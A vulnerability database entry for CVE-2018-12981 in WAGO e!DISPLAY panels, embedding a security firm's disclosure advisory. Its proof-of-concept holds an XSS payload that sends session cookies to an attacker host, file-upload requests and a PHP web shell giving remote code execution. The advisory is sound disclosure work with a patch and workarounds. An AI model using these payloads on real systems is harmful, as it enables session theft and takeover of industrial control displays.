Vulnerabilities > CVE-2018-12981 - Cross-site Scripting vulnerability in Wago products

047910
CVSS 3.5 - LOW
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
SINGLE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
wago
CWE-79
exploit available
NVD
Published: 2018-07-12
Updated: 2021-05-20

Summary

An issue was discovered on WAGO e!DISPLAY 762-3000 through 762-3003 devices with firmware before FW 02. The vulnerability can be exploited by authenticated and unauthenticated users by sending special crafted requests to the web server allowing injecting code within the WBM. The code will be rendered and/or executed in the browser of the user's browser.

Vulnerable Configurations

Part Description Count
OS
Wago
4
Hardware
Wago
4

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Cross Site Scripting through Log Files
    An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
  • Embedding Scripts in Non-Script Elements
    This attack is a form of Cross-Site Scripting (XSS) where malicious scripts are embedded in elements that are not expected to host scripts such as image tags (<img>), comments in XML documents (< !-CDATA->), etc. These tags may not be subject to the same input validation, output validation, and other content filtering and checking routines, so this can create an opportunity for an attacker to tunnel through the application's elements and launch a XSS attack through other elements. As with all remote attacks, it is important to differentiate the ability to launch an attack (such as probing an internal network for unpatched servers) and the ability of the remote attacker to collect and interpret the output of said attack.
  • Embedding Scripts within Scripts
    An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute scripts. The attacker leverages this capability to execute scripts to execute his/her own script by embedding it within other scripts that the target software is likely to execute. The attacker must have the ability to inject script into script that is likely to be executed. If this is done, then the attacker can potentially launch a variety of probes and attacks against the web server's local environment, in many cases the so-called DMZ, back end resources the web server can communicate with, and other hosts. With the proliferation of intermediaries, such as Web App Firewalls, network devices, and even printers having JVMs and Web servers, there are many locales where an attacker can inject malicious scripts. Since this attack pattern defines scripts within scripts, there are likely privileges to execute said attack on the host. Of course, these attacks are not solely limited to the server side, client side scripts like Ajax and client side JavaScript can contain malicious scripts as well. In general all that is required is for there to be sufficient privileges to execute a script, but not protected against writing.
  • Cross-Site Scripting in Error Pages
    An attacker distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page. When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the attacker the infected error message error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.
  • Cross-Site Scripting Using Alternate Syntax
    The attacker uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the "script" tag using the alternate forms of "Script" or "ScRiPt" may bypass filters where "script" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.

Exploit-Db

descriptionWAGO e!DISPLAY 7300T - Multiple Vulnerabilities. CVE-2018-12979,CVE-2018-12980,CVE-2018-12981. Webapps exploit for PHP platform. Tags: Cross-Site Scripting (...
fileexploits/php/webapps/45014.txt
idEDB-ID:45014
last seen2018-07-13
modified2018-07-13
platformphp
port80
published2018-07-13
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/45014/
titleWAGO e!DISPLAY 7300T - Multiple Vulnerabilities
typewebapps

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/148494/SA-20180711-0.txt
idPACKETSTORM:148494
last seen2018-07-12
published2018-07-11
reporterT. Weber
sourcehttps://packetstormsecurity.com/files/148494/WAGO-e-DISPLAY-7300T-XSS-File-Upload-Code-Execution.html
titleWAGO e!DISPLAY 7300T XSS / File Upload / Code Execution

Seebug

bulletinFamilyexploit
description### VENDOR DESCRIPTION “New ideas are the driving force behind our success WAGO is a family-owned company headquartered in Minden, Germany. Independently operating for three generations, WAGO is the global leader of spring pressure electrical interconnect and automation solutions. For more than 60 years, WAGO has developed and produced innovative products for packaging, transportation, process, industrial and building automation markets amongst others. Aside from its innovations in spring pressure connection technology, WAGO has introduced numerous innovations that have revolutionized industry. Further ground-breaking inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®.” Source: http://www.wago.us/wago/ “For visualization tasks with CODESYS 2 and CODESYS 3: WAGO’s new e!DISPLAY 7300T Web Panels help you reinforce the quality of your machinery and equipment with a refined design and industry-leading software. Learn more about how the right Web Panels make a difference. HMI components are the finishing touch for machines or systems and they have an overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing HMIs that leave a lasting impression and significantly increase both the value and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is available in 4.3”, 5.7”, 7.0” and 10.1” display sizes.” Source: http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp ### BUSINESS RECOMMENDATION HMI displays are widely used in SCADA infrastructures. The link between their administrative (or informational) web interfaces and the users which access these interfaces is critical. The presented attacks demonstrate how simple it is to inject malicious code in order to break the security of this link by exploiting minimal user interaction. As a consequence a computer which is used for HMI administration should not provide any possibility to get compromised via malicious script code. One possible solution may be e.g.: * Don’t allow email clients * Don’t provide Internet access at all on the HMI stations SEC Consult recommends to immediately apply the available patches from the vendor. A thorough security review should be performed by security professionals to identify further potential security issues. ### VULNERABILITY OVERVIEW/DESCRIPTION #### 1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981) Reflected cross site scripting vulnerabilities were identified within multiple PHP scripts in the admin interface. The parameter JSON input which is sent to the device is not sanitized sufficiently. An attacker can exploit this vulnerability to execute arbitrary scripts in the context of the attacked user and gain control over the active session. This vulnerability is present for authenticated and unauthenticated users! #### 2) Stored Cross-Site Scripting (CVE-2018-12981) A stored cross-site scripting vulnerability was identified within the “PLC List” which can be configured in the web interface of the e!Display. By storing a payload there, an administrative or guest user can be attacked without tricking them to visit a malicious web site or clicking on an malicious link. This vulnerability is only present for authenticated users! #### 3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980) Arbitrary files can be uploaded to the system without any check. It is even possible to change the location of the uploaded file on the system. As the web service does not run as privileged user, it is not possible to upload a file directly to the web root but on many other locations on the file system. The normal user ‘user’ and the administrative user ‘admin’ can both upload files to the system. #### 4) Incorrect Default Permissions (CVE-2018-12979) Due to incorrect default permissions a file in the web root can be overwritten by the unprivileged ‘www’ user. This is the same user which is used in the context of the web server. #### 5) Remote code execution via multiple attack vectors By stacking vulnerability 1)/2), 3) and 4) with this vulnerability an outside attacker can place a malicious script on the device in order to execute arbitrary commands as ‘www’. This can be done by uploading a web shell or a reverse shell. ### PROOF OF CONCEPT 1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981) The affected endpoints are: ``` http://<IP-Address>/wbm/configtools.php http://<IP-Address>/wbm/login.php http://<IP-Address>/wbm/receive_upload.php ``` The following request is an example for reflected XSS within ‘configtools.php’: ``` POST /wbm/configtools.php HTTP/1.1 Host: <IP-Address> Content-type: text/plain [...] {"sessionId":"","aDeviceParams":{"0":{"name":"firewall","parameter":["iptables","--get-xml"],"sudo":true,"multiline":true,"timeout":10000},"1":{"name":"firewall","parameter":["firewall","--is-enabled"],"sudo":true,"multiline":true,"timeout":10000,"dataId":"{DoNotParseAsXml}<img src=x onerror=this.src='http://$attacker:8001/?c='+document.cookie>;"}}} ``` Steal the cookie via XSS and send it to http://$attacker:8001?c=<Session-ID>: ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://<IP-Address>/wbm/configtools.php" method="POST" enctype="text/plain"> <input type="hidden" name="&#123;&quot;sessionId&quot;&#58;&quot;&quot;&#44;&quot;aDeviceParams&quot;&#58;&#123;&quot;0&quot;&#58;&#123;&quot;name&quot;&#58;&quot;firewall&quot;&#44;&quot;parameter&quot;&#58;&#91;&quot;iptables&quot;&#44;&quot;&#45;&#45;get&#45;xml&quot;&#93;&#44;&quot;sudo&quot;&#58;true&#44;&quot;multiline&quot;&#58;true&#44;&quot;timeout&quot;&#58;10000&#125;&#44;&quot;1&quot;&#58;&#123;&quot;name&quot;&#58;&quot;firewall&quot;&#44;&quot;parameter&quot;&#58;&#91;&quot;firewall&quot;&#44;&quot;&#45;&#45;is&#45;enabled&quot;&#93;&#44;&quot;sudo&quot;&#58;true&#44;&quot;multiline&quot;&#58;true&#44;&quot;timeout&quot;&#58;10000&#44;&quot;dataId&quot;&#58;&quot;&#123;DoNotParseAsXml&#125;&lt;img&#32;src" value="x&#32;onerror&#61;this&#46;src&#61;&apos;http&#58;&#47;&#47;&#46;&#46;&#46;&#58;8001&#47;&#63;c&#61;&apos;&#43;document&#46;cookie&gt;&#59;&quot;&#125;&#125;&#125;" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` 2) Stored Cross-Site Scripting (CVE-2018-12981) To exploit this vulnerability malicious code has to be placed in the “PLC List” by surfing to the endpoint http://<IP-Address>/app/index.html and clicking on the tab “Application->PLC-List”. By opening one of the configurable PLCs the name can be changed in the box “Text:” in order to execute arbitrary script-code. For example: ``` <img src=a onerror=alert('SEC_Consult_XSS');alert(document.cookie)> ``` The payload can also be placed on the device by using the following POST request: ``` POST /wbm/configtools.php HTTP/1.1 Host: <IP-Address> [...] {"sessionId":"<Valid session-ID> ","aDeviceParams":{"0":{"name":"config_plcselect","parameter":[2,"url=https://127.0.0.1:8001","txt=<img src=a onerror=alert('SEC_Consult_XSS');alert(document.cookie)>","vkb=enabled","mon=1"],"sudo":true}}} ``` 3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980) The file path, the file name and the file content can be manipulated in any way. There is no server-side check for malicious files. ``` POST /wbm/receive_upload.php HTTP/1.1 Host: <IP-Address> [...] Content-Type: multipart/form-data; boundary=---------------------------728140389204955163192597293 -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="touchWbm" true -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="upload_type" font -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="session_id" <Valid session-ID> -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="upload_directory" /tmp/ -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="font_file"; filename="any_file.sh" Content-Type: application/x-font-ttf any-content #! -----------------------------728140389204955163192597293-- ``` 4) Incorrect Default Permissions (CVE-2018-12979) The file ‘index.html’ is owned by ‘www’ and can therefore also be overwritten with a web shell. ``` www@WAGO_eDisplay:/var/www ls -la drwxr-xr-x 5 root root 488 XXX 99 2018 . drwxr-xr-x 11 root root 824 XXX 99 2018 .. lrwxrwxrwx 1 root root 16 XXX 99 2018 app -> /var/www/WagoWBM -rw-r--r-- 1 www www 345 XXX 99 2018 index.html drwxr-xr-x 7 root root 776 XXX 99 2018 plclist drwxr-xr-x 3 root root 368 XXX 99 2018 WagoWBM drwxr-xr-x 2 root root 688 XXX 99 2018 wbm ``` 5) Remote code execution via multiple attack vectors By uploading a simple PHP shell and overwriting the ‘index.html’ file located under the web root an attacker can place a web shell which is reachable without any authentication. ``` POST /wbm/receive_upload.php HTTP/1.1 Host: <IP-Address> [...] Content-Type: multipart/form-data; boundary=---------------------------728140389204955163192597293 -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="touchWbm" true -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="upload_type" font -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="session_id" <Valid session-ID> -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="upload_directory" /var/www/ -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="font_file"; filename="index.html" Content-Type: application/x-font-ttf <html><body> <form method="GET" name="SEC Consult PoC" action=""> <input type="text" name="command"><input type="submit" value="Send"></form> <pre><?php if($_GET['command']){system($_GET['command']);} ?></pre> </body></html> -----------------------------728140389204955163192597293-- ``` The shell can now be reached via “http://<IP-Address>/index.html”. It is also possible to upload a reverse-shell to the system which connects to a computer outside of the actual network. ### VULNERABLE / TESTED VERSIONS The following device with the firmware version has been tested: * e!DISPLAY 7300T – WP 4.3 480×272 PIO1 – 01.01.10(01) According to WAGO the following e!DISPLAY versions are vulnerable: * 762-3000 FW 01 * 762-3001 FW 01 * 762-3002 FW 01 * 762-3003 FW 01 ### VENDOR CONTACT TIMELINE * 2018-04-30: Sending encrypted advisory to VDE CERT for coordination support ([email protected]) * 2018-05-02: Answer from VDE CERT that WAGO will be informed/contacted * 2018-05-08: Status update from VDE CERT * 2018-05-23: Asking for status update, no news from WAGO (via VDE CERT) * 2018-06-08: VDE CERT: WAGO fixed the vulnerabilities and firmware is in testing phase * 2018-06-12: WAGO requested more time, postponing release date, asking for affected & fixed versions * 2018-06-13: VDE CERT will request CVE numbers * 2018-06-17: WAGO scheduled the release for 2018-07-11 * 2018-06-26: VDE CERT sends WAGO advisory draft including affected/fixed versions * 2018-07-04: VDE CERT sends final WAGO advisory incl. CVE numbers * 2018-07-10: VDE CERT publishes security notice: https://cert.vde.com/de-de/advisories/vde-2018-010 * 2018-07-11: SEC Consult advisory release ### SOLUTION Update the device to the latest available firmware (FW 02). For further information see the vendor’s security notifications page: https://www.wago.com/de/automatisierungstechnik/security (German) Direct link to English WAGO advisory. ### WORKAROUND Restrict network access to the device, don’t allow Internet access from the HMI station and do not install software from untrusted sources.
idSSV:97417
last seen2018-07-13
modified2018-07-12
published2018-07-12
reporterMy Seebug
titleRemote code execution via multiple attack vectors in WAGO e!DISPLAY 7300T

References